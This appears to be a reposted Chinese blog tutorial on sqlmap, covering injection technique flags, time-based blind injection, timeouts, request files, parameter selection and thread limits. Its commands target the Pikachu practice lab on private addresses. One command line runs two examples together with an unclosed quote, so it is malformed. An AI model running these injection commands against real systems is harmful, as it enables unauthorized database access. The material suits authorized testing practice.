当前位置:网站首页>SQLMAP使用教程(三)实战技巧二

SQLMAP使用教程(三)实战技巧二

2022-07-06 05:48:00 Aτθ

一、–technique 使用指定的注入方式

在一些项目中,难免会遇上网络反应缓慢,idc还有检测sqlmap的能力。作为一个专业的渗透测试人员,必须做到快准狠。
有些SQL注入点只允许时间注入,这时指定SQLMAP的注入类型为T

以下是--technique 参数的值的解释:
B:Boolean-basedblindSQLinjection(布尔型注入)
E:Error-basedSQLinjection(报错型注入)
U:UNIONquerySQLinjection(可联合查询注入)
S:StackedqueriesSQLinjection(可多语句查询注入)
T:Time-basedblindSQLinjection(基于时间延迟注入)
Q:InlineSQLInjection(内联注入)

二、使用基于时间的延时注入

sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 3 -D pikachu --technique=T 
支持多种注入检测,默认是全部:
sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 3 -D pikachu --technique=BEUT

在这里插入图片描述在这里插入图片描述

三、设置超时时间

--time-out 这个参数是设置超时时间 有得网页响应比较慢,可以使用这个参数来增大访问超时的时间。默认是30
sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 3 -D pikachu --timeout=10

四、读取文本进行SQL注入检测

sqlmap -r post.txt

在这里插入图片描述

在这里插入图片描述在这里插入图片描述

五、指定参数进行注入

-p 指定需要测试的参数
sqlmap -u "http://192.168.0.103/06/vul/sqli/sqli_str.php?name=1&submit=1" -p name --dbms mysql -v 1 

使用*进行注入
如果url是伪静态的时 ,可以使用*号表示这是检测的地方;
sqlmap -u "http://192.168.0.103/06/vul/sqli/id/1*./html POST注入 sqlmap -u "http://192.168.0.103/06/vul/sqli/sqli_id.php" --data "id=1&submit=1" -p id -v 1

六、修改默认最大线程

sqlmap/lib/core/settings.py 
默认最大线程是10 可以设置线程最大为100
MAX_NUMBER_OF_THREADS = 100

在这里插入图片描述

原网站

版权声明
本文为[Aτθ]所创,转载请带上原文链接,感谢
https://blog.csdn.net/weixin_51730169/article/details/125610791